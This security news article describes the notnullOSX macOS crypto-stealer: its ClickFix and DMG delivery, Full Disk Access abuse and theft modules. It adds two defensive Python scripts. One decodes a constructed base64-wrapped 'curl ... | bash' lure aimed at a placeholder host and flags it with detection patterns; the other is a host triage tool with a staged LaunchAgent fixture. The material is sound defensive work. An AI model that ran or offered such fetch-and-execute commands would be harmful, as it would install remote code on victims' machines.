A new macOS info-stealer named notnullOSX has surfaced, targeting crypto holders with wallets above $10,000.
Written in Go, it uses two parallel attack paths — ClickFix social engineering and malicious DMG disk image files — to silently compromise Apple Mac systems.
The malware is highly targeted, with operators hand-picking each victim through an affiliate panel before launching an attack.
The story behind notnullOSX stretches back to 2022 and a developer known as 0xFFF, who first posted about a rough macOS stealer on underground forums.
After a dramatic exit in 2023 — triggered by a fabricated law enforcement tip reportedly set up by a rival — 0xFFF disappeared, leaving paying subscribers without refunds.
In August 2024, the same actor returned under a new alias, alh1mik, posted an apology, and began taking preorders for a new macOS stealer at $400 per month. By 2026, that offer had materialized.
Moonlock Lab researchers identified and recorded the first detections of notnullOSX on March 30, 2026, across three regions — Vietnam, Taiwan, and Spain.
Their analysis also confirmed how selectively victims are chosen: before anyone is targeted, an operator must submit a form to the affiliate panel that includes the victim's social media profiles, wallet address, and correspondence history.
The minimum wallet balance is $10,000; submissions below that figure are rejected automatically.
The infection begins with a fake protected Google document, which shows an encryption error and urges the victim to take one of two actions — both leading to the same malware.
The first path uses ClickFix: the victim is told to open Terminal and paste a base64-encoded command, which silently fetches and executes a remote bash installer script.
The second delivers a malicious DMG disk image containing a README, an install script, and a Terminal shortcut, packaged to look entirely routine. In both cases, the victim unknowingly installs the malware without triggering a single security warning.
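The ClickFix path relies on the victim never seeing what the pasted command does, so the practical check is to decode it before running anything. The script below is an added example, not code from the Moonlock Lab report or from the malware: it peels base64 layers off a pasted one-liner without executing them and flags the "fetch a script and pipe it into a shell" shape the article describes. The sample command and its placeholder host (`lure.example.invalid`) are constructed for the example and are not the real lure.

```python
"""Decode a ClickFix-style Terminal one-liner without executing it."""
import base64
import re

# Constructed sample, NOT the real notnullOSX command: a placeholder host,
# wrapped the way the article describes (base64 layer, then a shell).
INNER = "curl -fsSL https://lure.example.invalid/install.sh | bash"
SAMPLE_PASTE = "echo " + base64.b64encode(INNER.encode()).decode() + " | base64 -d | sh"

# A run of base64 alphabet long enough to be worth trying to decode.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Patterns a practitioner would refuse to paste, with a short reason each.
INDICATORS = [
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(bash|zsh|sh)\b"), "remote script piped into a shell"),
    (re.compile(r"\bbase64\s+(-d|-D|--decode)\b"), "base64 decode stage hides the real command"),
    (re.compile(r"\bxattr\s+-[a-z]*d[a-z]*\s+com\.apple\.quarantine\b"), "quarantine attribute removed"),
    (re.compile(r"\bosascript\b"), "AppleScript invoked (often a fake password prompt)"),
]


def decode_layers(cmd, max_depth=5):
    """Return [cmd, decoded-once, decoded-twice, ...] until nothing decodes cleanly."""
    layers = [cmd]
    for _ in range(max_depth):
        m = B64_TOKEN.search(layers[-1])
        if not m:
            break
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            break
        if not decoded.isprintable():   # binary blob, not a command string
            break
        layers.append(decoded)
    return layers


def analyze(cmd):
    """Decode every layer and collect indicator matches per layer."""
    layers = decode_layers(cmd)
    findings = []
    for i, layer in enumerate(layers):
        for pattern, reason in INDICATORS:
            if pattern.search(layer):
                findings.append(f"layer {i}: {reason}")
    return {"layers": layers, "findings": findings, "suspicious": bool(findings)}


if __name__ == "__main__":
    report = analyze(SAMPLE_PASTE)
    for i, layer in enumerate(report["layers"]):
        print(f"layer {i}: {layer}")
    for f in report["findings"]:
        print("!", f)
```

The decoder stops at the first layer that is not printable text, so a payload that decodes to a Mach-O rather than a shell string is reported as opaque instead of being mis-read; anything with a finding should simply not be pasted.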
The distribution network goes further. A fake product page for a wallpaper app called WallSpace was set up at wallpapermacos[.]com, with polished screenshots and a free download button.
A hijacked YouTube channel, dormant since 2015, promoted the fake app with a single video that accumulated 50,000 views in just two weeks — consistent with paid promotion or SEO manipulation.
Inside the Attack: TCC Bypass and Modular Data Theft
What makes notnullOSX particularly dangerous is how it turns macOS’s own permission system against its users.
Normally, Apple's Transparency, Consent, and Control (TCC) framework prompts the user the first time an app tries to access a protected data class, such as messages, notes, or browser cookies, and each class is approved separately. notnullOSX sidesteps those prompts by walking the victim through manually granting it Full Disk Access in System Settings.
That single grant covers every file-backed protected data location at once (the Messages, Notes, Mail and browser databases among them), so no further dialogs appear for any of the modules that follow.
The malware operates through a modular architecture, downloading separate binaries from its C2 server to handle each theft task.
Confirmed modules include iMessageGrab, AppleNotesGrab, CryptoWalletsGrab, BrowserGrab, TelegramGrab, CredsGrab, and ReplaceApp.
ReplaceApp is especially alarming: it silently swaps a legitimate hardware wallet app like Ledger Live with a trojanized clone designed to intercept seed phrases at setup.
Even users relying on hardware wallets are at risk if the managing app on their Mac is replaced without any visible sign.
Beyond theft, notnullOSX holds a persistent WebSocket connection to a Firebase-hosted C2 server, sending regular heartbeats and waiting for remote commands — behavior far closer to a remote access trojan than a one-time stealer.
Moonlock Lab’s detection notes recommend that security teams block outbound connections to the known C2 domain, alert on Full Disk Access grants to unrecognized applications, and monitor /tmp for staged Mach-O binaries.
For Mac users and crypto holders, the advice is direct: never paste Terminal commands from a browser or document, treat any app that asks for Full Disk Access during installation as suspicious, and check ~/Library/LaunchAgents/ for unfamiliar entries, particularly ones whose program lives in /tmp or a hidden folder in the home directory.
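The three host-side checks above (staged Mach-O binaries in /tmp, unfamiliar LaunchAgents, and Full Disk Access grants) can be scripted. The following is an added example written for this page, not a Moonlock Lab tool: it identifies Mach-O files by their magic bytes, reviews LaunchAgent plists for programs that live outside the usual install locations or arguments that reference a staging path, and lists clients allowed `kTCCServiceSystemPolicyAllFiles` in a TCC database. The TCC query assumes the `access` table layout used since macOS 11 (auth_value 2 = allowed, client_type 0 = bundle id); the fixture directory, the `com.update.helper` agent name and the `com.example.installer` bundle id are constructed for the example.

```python
"""Host triage for the artifacts named above: Mach-O files staged in a scratch
directory, LaunchAgents whose program is out of place, and Full Disk Access
grants in a TCC database. A constructed fixture is built at the bottom; on a
Mac, point the functions at /tmp, ~/Library/LaunchAgents and the system TCC.db."""
import plistlib
import sqlite3
import tempfile
from pathlib import Path

MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",   # 32-bit Mach-O, both byte orders
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",   # 64-bit Mach-O
    b"\xca\xfe\xba\xbe",                        # fat/universal (Java .class shares it)
}
# Where a LaunchAgent's program is expected to live; tune for your fleet,
# otherwise Homebrew and per-user tools show up for review.
EXPECTED_PREFIXES = ("/Applications/", "/System/", "/usr/", "/bin/", "/sbin/",
                     "/Library/", "/opt/homebrew/")
# Argument fragments typical of a staged dropper rather than an installed app.
STAGING_HINTS = ("/tmp/", "/private/tmp/", "/var/folders/", "curl ", "base64")
FDA_SERVICE = "kTCCServiceSystemPolicyAllFiles"


def find_macho(directory):
    """Paths of regular files under `directory` whose first 4 bytes are a Mach-O magic."""
    hits = []
    for p in Path(directory).rglob("*"):
        if p.is_symlink() or not p.is_file():
            continue
        try:
            with p.open("rb") as fh:
                magic = fh.read(4)
        except OSError:
            continue
        if magic in MACHO_MAGICS:
            hits.append(str(p))
    return sorted(hits)


def review_launch_agents(directory):
    """(plist path, reason) for agents whose program or arguments look staged."""
    findings = []
    for p in sorted(Path(directory).glob("*.plist")):
        try:
            with p.open("rb") as fh:
                d = plistlib.load(fh)
        except Exception:
            findings.append((str(p), "unparseable plist"))
            continue
        args = list(d.get("ProgramArguments") or [])
        program = d.get("Program") or (args[0] if args else "")
        if not program.startswith(EXPECTED_PREFIXES):
            findings.append((str(p), f"program outside expected locations: {program}"))
        elif any(h in a for a in args for h in STAGING_HINTS):
            findings.append((str(p), f"staging hint in arguments: {' '.join(args)}"))
    return findings


def full_disk_access_grants(tcc_db):
    """Clients allowed Full Disk Access. Assumes the `access` table layout used
    since macOS 11 (auth_value 2 = allowed; client_type 0 = bundle id, 1 = path).
    The system db under /Library/Application Support/com.apple.TCC/ needs root
    and FDA itself to read, so run this from an already-trusted admin tool."""
    con = sqlite3.connect(f"file:{tcc_db}?mode=ro", uri=True)
    try:
        rows = con.execute(
            "SELECT client, client_type FROM access "
            "WHERE service = ? AND auth_value = 2", (FDA_SERVICE,)).fetchall()
    finally:
        con.close()
    return [(client, "bundle id" if ctype == 0 else "path") for client, ctype in rows]


def build_fixture(root):
    """Constructed test data: one fake Mach-O in a scratch dir, one benign and
    one staged LaunchAgent (hypothetical names), and a minimal TCC.db."""
    root = Path(root)
    scratch, agents = root / "tmp", root / "LaunchAgents"
    scratch.mkdir()
    agents.mkdir()
    (scratch / "dropper").write_bytes(b"\xcf\xfa\xed\xfe" + b"\0" * 28)   # MH_MAGIC_64, little-endian
    (scratch / "notes.txt").write_bytes(b"plain text, not a binary\n")
    with (agents / "com.example.benign.plist").open("wb") as fh:
        plistlib.dump({"Label": "com.example.benign", "ProgramArguments": ["/usr/bin/true"]}, fh)
    with (agents / "com.update.helper.plist").open("wb") as fh:
        plistlib.dump({"Label": "com.update.helper", "RunAtLoad": True,
                       "ProgramArguments": ["/bin/sh", "-c", "/tmp/.cache/agent"]}, fh)
    db = root / "TCC.db"
    con = sqlite3.connect(db)
    con.execute("CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, auth_value INTEGER)")
    con.executemany("INSERT INTO access VALUES (?,?,?,?)", [
        (FDA_SERVICE, "com.example.installer", 0, 2),            # allowed: reported
        (FDA_SERVICE, "/Users/me/Downloads/install", 1, 0),      # denied: not reported
        ("kTCCServiceCamera", "com.example.cam", 0, 2),          # other service: not reported
    ])
    con.commit()
    con.close()
    return scratch, agents, db


def run_on_fixture():
    """Build the fixture in a temp dir and return the three check results."""
    with tempfile.TemporaryDirectory() as tmp:
        scratch, agents, db = build_fixture(tmp)
        return {"macho": find_macho(scratch),
                "agents": review_launch_agents(agents),
                "fda": full_disk_access_grants(db)}


if __name__ == "__main__":
    for name, result in run_on_fixture().items():
        print(name, result)
```

The LaunchAgent check reports entries for review rather than declaring them malicious: a developer's own agent under $HOME will be listed too, which is the point, since the article's indicator is an entry the user does not recognise.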

